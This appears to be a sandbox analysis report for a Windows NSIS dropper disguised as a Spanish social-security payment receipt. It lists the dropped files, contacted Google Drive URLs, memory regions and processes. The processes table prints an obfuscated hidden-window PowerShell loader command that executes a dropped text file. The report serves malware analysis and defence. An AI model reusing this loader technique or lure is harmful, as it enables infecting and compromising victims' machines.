Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Intelligentes.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\nonwavering.Dor
|
ASCII text, with very long lines (53355), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Intelligentes.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32vx2rfm.k1s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyqz0mjf.1nb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\nsm4FAD.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Easterlies.bin
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Tingent\Mesaconate\Ungkarlenes\Frkkest\Wawa.gim
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\dataformat.una
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\disobeyal.gua
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\morey.sul
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\naboens.eme
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Undomiciled\Nyhedsdkning\nanocuries.zab
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\Squires12.ret
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\bankrs.sab
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\beagle.cop
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\bepat.rom
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\Venligsindet\commonage.gun
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\omnivorousnesses\Luftangrebenes\Uforstligt\Earthshaker58\perlustrator.svl
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\omnivorousnesses\Luftangrebenes\Uforstligt\Earthshaker58\restocked.tem
|
GTA audio index data (SDT)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\omnivorousnesses\Luftangrebenes\Uforstligt\Earthshaker58\rustyish.dit
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\unrhyming\Ejendomsretten.cab
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\unrhyming\Kvantumsrabats162.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\unrhyming\Ridehest87.uve
|
data
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe
|
"C:\Users\user\Desktop\JUSTIFICANTE DE PAGO S.SOCIAL (1)pdf.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" -windowstyle hidden "$Riparious=Get-Content 'C:\Users\user\AppData\Roaming\Molds190\Revaccinationer\nonwavering.Dor';$Craunching=$Riparious.SubString(53285,3);.$Craunching($Riparious)"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
||
C:\Users\user\AppData\Local\Temp\Intelligentes.exe
|
"C:\Users\user\AppData\Local\Temp\Intelligentes.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://www.google.com
|
unknown
|
||
https://drive.google.com/F6EB83BEBC2FBA90920B1
|
unknown
|
||
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
|
unknown
|
||
https://drive.google.com/=J
|
unknown
|
||
https://drive.google.com/
|
unknown
|
||
https://drive.google.com/ertificates
|
unknown
|
||
https://drive.google.com/S
|
unknown
|
||
https://drive.google.com/s
|
unknown
|
||
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
https://apis.googl
|
unknown
|
||
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
|
unknown
|
||
http://akeo.ie)4
|
unknown
|
||
http://www.ftp.ftp://ftp.gopher.
|
unknown
|
||
https://drive.usercontent.google.com/
|
unknown
|
||
https://apis.google.com
|
unknown
|
||
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
https://drive.google.com/MJo
|
unknown
|
||
https://apis.E
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
drive.google.com
|
172.253.122.113
|
||
drive.usercontent.google.com
|
172.253.122.132
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
172.253.122.132
|
drive.usercontent.google.com
|
United States
|
||
172.253.122.113
|
drive.google.com
|
United States
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
359E000
|
remote allocation
|
page execute and read and write
|
||
96000
|
stack
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
449000
|
unkown
|
page readonly
|
||
5D70000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
5D6F000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
358E000
|
stack
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D1F000
|
heap
|
page read and write
|
||
5D1F000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
213DF000
|
stack
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5EC000
|
unkown
|
page execute read
|
||
5D0D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
61E000
|
stack
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D26000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D0D000
|
heap
|
page read and write
|
||
3330000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
20E20000
|
direct allocation
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5F0000
|
unkown
|
page execute read
|
||
354E000
|
unkown
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
307D000
|
stack
|
page read and write
|
||
5F2000
|
unkown
|
page execute read
|
||
5D77000
|
heap
|
page read and write
|
||
5D07000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
40C000
|
unkown
|
page read and write
|
||
5D25000
|
heap
|
page read and write
|
||
5D07000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5CA0000
|
direct allocation
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D72000
|
heap
|
page read and write
|
||
5D23000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5D1A000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D1B000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
3F9E000
|
remote allocation
|
page execute and read and write
|
||
449000
|
unkown
|
page readonly
|
||
260E000
|
stack
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
2156F000
|
stack
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D25000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
648000
|
heap
|
page read and write
|
||
5D07000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5C90000
|
direct allocation
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
539E000
|
remote allocation
|
page execute and read and write
|
||
2139E000
|
stack
|
page read and write
|
||
427000
|
unkown
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D72000
|
heap
|
page read and write
|
||
67E000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
3170000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
686000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
3740000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D63000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D1D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D07000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5EE000
|
unkown
|
page execute read
|
||
5D66000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
3750000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
76C0000
|
trusted library allocation
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
42F000
|
unkown
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
2B9E000
|
remote allocation
|
page execute and read and write
|
||
2180000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5E8000
|
unkown
|
page execute read
|
||
5D70000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
2148E000
|
stack
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D25000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
499E000
|
remote allocation
|
page execute and read and write
|
||
270F000
|
stack
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
20DC0000
|
direct allocation
|
page read and write
|
||
5D1B000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
6090000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
626000
|
unkown
|
page execute read
|
||
5D77000
|
heap
|
page read and write
|
||
5E4000
|
unkown
|
page execute read
|
||
5D77000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
368F000
|
stack
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
2842000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D72000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
5D73000
|
heap
|
page read and write
|
||
5D26000
|
heap
|
page read and write
|
||
630000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5D73000
|
heap
|
page read and write
|
||
5D25000
|
heap
|
page read and write
|
||
5C30000
|
direct allocation
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5D0D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
20E10000
|
direct allocation
|
page read and write
|
||
5E6000
|
unkown
|
page execute read
|
||
5D73000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
649000
|
unkown
|
page execute read
|
||
5D73000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5EA000
|
unkown
|
page execute read
|
||
2740000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
20DF0000
|
direct allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5D73000
|
heap
|
page read and write
|
||
5C45000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
1660000
|
remote allocation
|
page execute and read and write
|
||
5D73000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
5D66000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
25CF000
|
stack
|
page read and write
|
||
212DD000
|
stack
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5CB0000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
9C000
|
stack
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D23000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
635000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
20F0000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
179E000
|
remote allocation
|
page execute and read and write
|
||
640000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D0D000
|
heap
|
page read and write
|
||
214F0000
|
remote allocation
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
213F0000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D63000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D07000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
317D000
|
stack
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
2144E000
|
stack
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
20E00000
|
direct allocation
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
5D71000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
4CE000
|
stack
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
2131D000
|
stack
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
20E40000
|
direct allocation
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
4F0000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5CF4000
|
heap
|
page read and write
|
||
5BC0000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D24000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
446000
|
unkown
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
2152E000
|
stack
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
2750000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D72000
|
heap
|
page read and write
|
||
5D0D000
|
heap
|
page read and write
|
||
5D0D000
|
heap
|
page read and write
|
||
5D1F000
|
heap
|
page read and write
|
||
320B000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5C10000
|
heap
|
page read and write
|
||
3770000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
20E30000
|
direct allocation
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
214E000
|
stack
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
5D70000
|
heap
|
page read and write
|
||
93F000
|
stack
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D60000
|
heap
|
page read and write
|
||
5D6C000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
20DD0000
|
direct allocation
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5C40000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
5D0D000
|
heap
|
page read and write
|
||
5D26000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D1D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5D6F000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
19B000
|
stack
|
page read and write
|
||
5D1B000
|
heap
|
page read and write
|
||
5D6A000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D69000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
31F0000
|
heap
|
page read and write
|
||
5D6B000
|
heap
|
page read and write
|
||
42B000
|
unkown
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D76000
|
heap
|
page read and write
|
||
5D6F000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D73000
|
heap
|
page read and write
|
||
5D63000
|
heap
|
page read and write
|
||
20DE0000
|
direct allocation
|
page read and write
|
||
5D71000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
214F0000
|
remote allocation
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D07000
|
heap
|
page read and write
|
||
83F000
|
stack
|
page read and write
|
||
5D25000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
505000
|
heap
|
page read and write
|
||
219E000
|
remote allocation
|
page execute and read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
5CB8000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
5D70000
|
heap
|
page read and write
|
||
480000
|
heap
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
214F0000
|
remote allocation
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
||
344E000
|
unkown
|
page read and write
|
||
449000
|
unkown
|
page readonly
|
||
5D6A000
|
heap
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
There are 473 hidden memdumps, click here to show them.